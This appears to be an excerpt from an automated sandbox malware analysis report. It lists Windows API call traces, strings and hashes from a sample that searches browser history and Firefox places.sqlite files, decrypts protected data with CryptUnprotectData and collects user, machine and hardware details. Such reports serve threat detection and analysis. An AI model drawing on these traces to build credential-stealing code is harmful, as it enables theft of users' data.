                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitFreeLibraryProcess
                    • String ID:
                    • API String ID: 1404682716-0
                    • Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                    • Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
                    • Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                    • Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 919 4033f0-40340b 920 403423-40342a 919->920 921 40340d-403410 919->921 923 40342c-403438 call 4032dc call 403368 920->923 924 40343d-403441 920->924 921->920 922 403412-403421 921->922 922->920 923->924 926 403443-403446 924->926 927 40344d-403456 call 4031dc 924->927 926->927 930 403448-40344a 926->930 935 403458-40345b 927->935 936 40345d-403462 927->936 930->927 935->936 937 40347e-403487 call 4031b4 935->937 936->937 938 403464-403472 call 404890 936->938 944 403489 937->944 945 40348c-403490 937->945 938->937 943 403474-403476 938->943 943->937 946 403478-403479 FreeLibrary 943->946 944->945 947 403492 call 403338 945->947 948 403497-40349a 945->948 946->937 947->948 950 4034b3 948->950 951 40349c-4034a3 948->951 952 4034a5 951->952 953 4034ab-4034ae ExitProcess 951->953 952->953
                    APIs
                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitFreeLibraryProcess
                    • String ID:
                    • API String ID: 1404682716-0
                    • Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                    • Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
                    • Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                    • Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: String$AllocFreeOpenQueryValue
                    • String ID:
                    • API String ID: 967375698-0
                    • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                    • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                    • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                    • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                    APIs
                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: String$AllocFreeOpenQueryValue
                    • String ID:
                    • API String ID: 967375698-0
                    • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                    • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                    • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                    • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                    APIs
                    • SetErrorMode.KERNEL32(00000400,?,?,0061FF9B,?,?), ref: 00620B7A
                    • SetErrorMode.KERNEL32(00000000,?,?,0061FF9B,?,?), ref: 00620B7F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 6fe4a5bb6d039ac60b994ea2f5bb51eac6380bcc9b8ab58dd562a939b5b37b69
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 91D0123114512877D7002A94DC09BCD7F1C9F05BA7F008011FB0DD9181C771994046E5
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                    • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                    • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                    • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
                    • Instruction ID: af14b0bc993fb8b73ba8c9c06f0f1e2b5db12d9d6a1e4dcc62beb331312aa7da
                    • Opcode Fuzzy Hash: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
                    • Instruction Fuzzy Hash: F0212875902629CFEB60CF68DD84B98B7B1BB09304F0485E6E50DA7392D630AE84DF24
                    APIs
                    • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                    • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
                    • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                    • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
                    APIs
                    • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                    • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
                    • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                    • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
                    APIs
                    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID:
                    • API String ID: 626452242-0
                    • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                    • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                    • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                    • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                    APIs
                    • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                    • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                    • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                    • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                    • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                    • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                    • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                    APIs
                    • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                    • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                    • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                    • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeString$FileFindFirst
                    • String ID: .LNK$._.$0_@$LLA$CA
                    • API String ID: 1653790112-882170572
                    • Opcode ID: e51857b0ac6e26b187f5ae22c82cec80f88bd72de0991bbfb205d8afb095c092
                    • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                    • Opcode Fuzzy Hash: e51857b0ac6e26b187f5ae22c82cec80f88bd72de0991bbfb205d8afb095c092
                    • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                    APIs
                    • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeString$InfoSystem
                    • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                    • API String ID: 4070941872-1038824218
                    • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                    • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                    • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                    • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                    APIs
                      • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                      • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
                    • GetCommandLineA.KERNEL32 ref: 00404C7B
                    • GetVersion.KERNEL32 ref: 00404C8F
                    • GetVersion.KERNEL32 ref: 00404CA0
                    • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                      • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                      • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                      • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                    • GetThreadLocale.KERNEL32 ref: 00404CBC
                      • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                    • String ID: `%`
                    • API String ID: 3734044017-316121997
                    • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                    • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                    • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                    • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: .txt$\*.*$\History
                    • API String ID: 1974802433-2232271174
                    • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                    • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                    • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                    • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: .txt$\*.*$\History
                    • API String ID: 1974802433-2232271174
                    • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                    • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                    • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                    • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: .txt$\*.*$\places.sqlite
                    • API String ID: 1974802433-3919338718
                    • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                    • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                    • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                    • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                      • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                      • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                    • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                    • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                    • String ID: .txt$\*.*
                    • API String ID: 4269597168-2615687548
                    • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                    • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                    • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                    • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                    • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                    • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstFreeNextString
                    • String ID: .txt$\*.*
                    • API String ID: 2008072091-2615687548
                    • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                    • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                    • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                    • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                    • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                    • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstFreeNextString
                    • String ID: .txt$\*.*
                    • API String ID: 2008072091-2615687548
                    • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                    • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                    • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                    • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: 24138d88fe7499a083de265e74783976d300f5581240314613688d94ca148035
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: B03147B6904619DFEB10CF98D880AADBBF6FB08324F24015AD841A7351D7B1EA45CFA4
                    APIs
                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                    • LocalFree.KERNEL32(?), ref: 0040950A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CryptDataFreeLocalUnprotect
                    • String ID:
                    • API String ID: 1561624719-0
                    • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                    • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
                    • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                    • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
                    APIs
                    • GetTimeZoneInformation.KERNEL32(00447DA8), ref: 00420091
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd
                    Similarity
                    • API ID: InformationTimeZone
                    • String ID:
                    • API String ID: 565725191-0
                    • Opcode ID: 7ce7c80205453f68d12abce02f74676c1c00403a76305533c351296e9444cde0
                    • Instruction ID: 7b922c0b01b976be8ebb097135107baff558c949ac8418f226cba57d9fc1e1fb
                    • Opcode Fuzzy Hash: 7ce7c80205453f68d12abce02f74676c1c00403a76305533c351296e9444cde0
                    • Instruction Fuzzy Hash: 5C417071E042289FDB10DF98EC81AAE7BF5EF09300F54416BE400A7262D7798D52CB28
                    APIs
                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
